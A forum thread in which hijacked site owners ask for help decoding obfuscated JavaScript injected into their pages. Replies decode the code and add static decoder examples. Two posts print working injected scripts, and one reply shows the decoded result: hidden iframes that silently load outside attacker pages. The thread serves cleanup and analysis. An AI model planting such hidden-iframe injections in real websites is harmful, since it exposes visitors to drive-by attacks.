
How to decode obfuscated JavaScript

P: 3
I have no knowledge of programming... I can usually look through a script though and figure out what the idea is.

Recently several of my sites got hijacked and below is the code that was inserted. What I'm trying to do is to decode it to figure out what its intent was and to see if it opened up any other holes in the server that I need to know about.

Maybe this is easy stuff... but I don't have a clue where to start ...

<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->

any help would be greatly appreciated.

TIA.
Sep 18 '07 #1
10 Replies


pbmods
Expert 5K+
P: 5,821
Heya, KyredBone. Welcome to TSDN!

Have a look at this thread.
Sep 18 '07 #2

P: 3
Ok... I looked at that and created a test.php on my server... I see the text box but it is empty... I'm guessing I've done something wrong... how much or what portion exactly do I need to put in

document.getElementById("test").value = unescape('code goes here')

and also do I need the " ' " around the code goes here ?
Sep 19 '07 #3

P: 3
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.

http://www.netdemon.net/haywyre/
Sep 19 '07 #4

acoder
Expert Mod 15k+
P: 16,027
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx.

http://www.netdemon.net/haywyre/
That thread dealt with a simple escaped string. Yours is a bit more complicated. That's why it wouldn't work.
Sep 19 '07 #5
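
An added example, not part of the original thread: a static decoder for the scheme in post #1, where the payload is a run of zero-padded three-digit decimal character codes and any code above 191 (0xBF) has 848 added, which maps Windows-1251 Cyrillic bytes to Unicode. The function names and the sample (pointing at example.invalid) are constructed for illustration; nothing is evaluated or written to a page.

```javascript
// Added example: decode the three-digit decimal scheme as text only.
const CP1251_SHIFT = 848; // the script adds "8"+"48" = 848 to codes above 0xBF

function decodeTriplets(digits) {
  const clean = digits.replace(/\s+/g, '');
  if (!/^\d*$/.test(clean)) throw new Error('non-digit input');
  let out = '';
  // A trailing partial group (fewer than 3 digits) is ignored.
  for (let i = 0; i + 3 <= clean.length; i += 3) {
    let code = parseInt(clean.slice(i, i + 3), 10);
    if (code > 0xBF) code += CP1251_SHIFT;
    out += String.fromCharCode(code);
  }
  return out;
}

// Collect the quoted digit literals (s+='...') from script source without running it.
function extractDigitString(scriptSource) {
  const literals = scriptSource.match(/'(\d{3,})'/g) || [];
  return literals.map(l => l.slice(1, -1)).join('');
}

// List the src value of every iframe found in the decoded markup.
function iframeSources(html) {
  const re = /<iframe\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/gi;
  const found = [];
  let m;
  while ((m = re.exec(html)) !== null) found.push(m[1]);
  return found;
}

// Constructed sample in the same shape as the injected script (not the thread's payload).
const sampleScript =
  "var s='';s+='060105102114097109101032';s=s+'115114099061034047047';" +
  "s+='101120097109112108101046105110118097108105100';s+='047120034062';";

const decoded = decodeTriplets(extractDigitString(sampleScript));
console.log(decoded);
console.log(iframeSources(decoded));
```
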

P: 5
Can anyone tell me about how to decode this script:

<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u0075\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e\u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u0074\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e\u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u0074\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e');
</script>

I encountered this on a friend's page and removed it. I know it is associated with traffurl.ru. My "noscript" add-on for Firefox blocked the site when I went to his web site, which was how I figured out it was in his page, but I cannot figure out a way to decode it to see what it is doing. Any help?
May 28 '08 #6

rnd me
Expert 100+
P: 427
[PHP]
<iframe src="http://traffurl.ru/sliv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

[/PHP]
May 28 '08 #7

acoder
Expert Mod 15k+
P: 16,027
Can anyone tell me about how to decode this script:
You've got the decoded version as posted by rnd me, but if you want to decode it yourself, here's a very easy way: replace the document.write with an alert.
May 29 '08 #8

P: 1
Can anyone help me decode these scripts?

dw_Inf.gw=dw_Inf.fn("\x77\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
dw_Inf.mg=dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x65\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x61\x72\x29');
dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65');
dw_Inf.x0=function(){dw_Inf.fn('\x69\x66\x28\x21\x28\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x64\x79\x6e\x2d\x77\x65\x62\x2e\x63\x6f\x6d\x22\x29\x21\x3d\x2d\x31\x29\x29\x61\x6c\x65\x72\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x6d\x67\x29\x3b');dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');dw_Inf.fn('\x64\x77\x5f\x73\x63\x72\x6f\x6c\x6c\x65\x72\x73\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');};
dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x78\x30\x28\x29\x3b');

Thanks in advance for all the help!!
Jun 25 '08 #9

acoder
Expert Mod 15k+
P: 16,027
First of all, welcome to Bytes!

What you can do is wrap those statements in strings and use document.write or alert to display. Those code snippets show as:
dw_Inf.gw=dw_Inf.fn("window.location");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
dw_Inf.mg=dw_Inf.fn('dw_Inf.get(dw_Inf.ar)');
dw_Inf.fn('dw_Inf.gw=dw_Inf.gw.hostname');
dw_Inf.x0=function(){dw_Inf.fn('if(!(dw_Inf.gw==""||dw_Inf.gw=="127.0.0.1"||dw_Inf.gw=="localhost"||dw_Inf.gw.indexOf("dyn-web.com")!=-1))alert(dw_Inf.mg);');dw_Inf.fn('dw_Inf.ready=true;');dw_Inf.fn('dw_scrollers.ready=true;');};
dw_Inf.fn('dw_Inf.x0();');
Jun 25 '08 #10
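
An added example, not part of the original thread: the `\xHH` and `\uHHHH` escapes and the character-code arrays seen in posts #6 and #9 can be resolved as plain text, so the script under analysis is never executed (swapping document.write for alert still runs it). Function names and the sample input are constructed for illustration.

```javascript
// Added example: resolve JavaScript string escapes without eval, alert or document.write.
function unescapeJsLiteral(text) {
  return text.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// Repeat until the text stops changing: one escaped string can hide another.
function unescapeLayers(text, maxRounds = 5) {
  let current = text;
  for (let round = 0; round < maxRounds; round++) {
    const next = unescapeJsLiteral(current);
    if (next === current) break;
    current = next;
  }
  return current;
}

// Decode arrays of decimal character codes such as [65,32,108,...].
// Short arrays are skipped because they are usually ordinary data.
function decodeCharCodeArrays(text, minLength = 8) {
  const found = [];
  const re = /\[\s*(\d{1,5}(?:\s*,\s*\d{1,5})+)\s*\]/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const codes = m[1].split(',').map(n => parseInt(n, 10));
    if (codes.length >= minLength) found.push(String.fromCharCode(...codes));
  }
  return found;
}

// Constructed sample: String.raw keeps the backslashes as literal text.
const sampleSource = String.raw`demo.fn('\x64\x65\x6d\x6f\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65');` +
  'demo.ar=[72,101,108,108,111,32,119,111,114,108,100];';

console.log(unescapeLayers(sampleSource));
console.log(decodeCharCodeArrays(sampleSource));
```
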

P: 1
Hello Guys,

I have solved your problems - I have made a little tool in VB.NET to decode and encode again - below you can find the link where you can also see the video on how to use it.

adeelnokiastuffs.blogspot.com/2010/08/javascript-hexa-codes-decoder-and.html

If anything, please email me at adeel.rizvi at yda.net.au
Aug 9 '10 #11
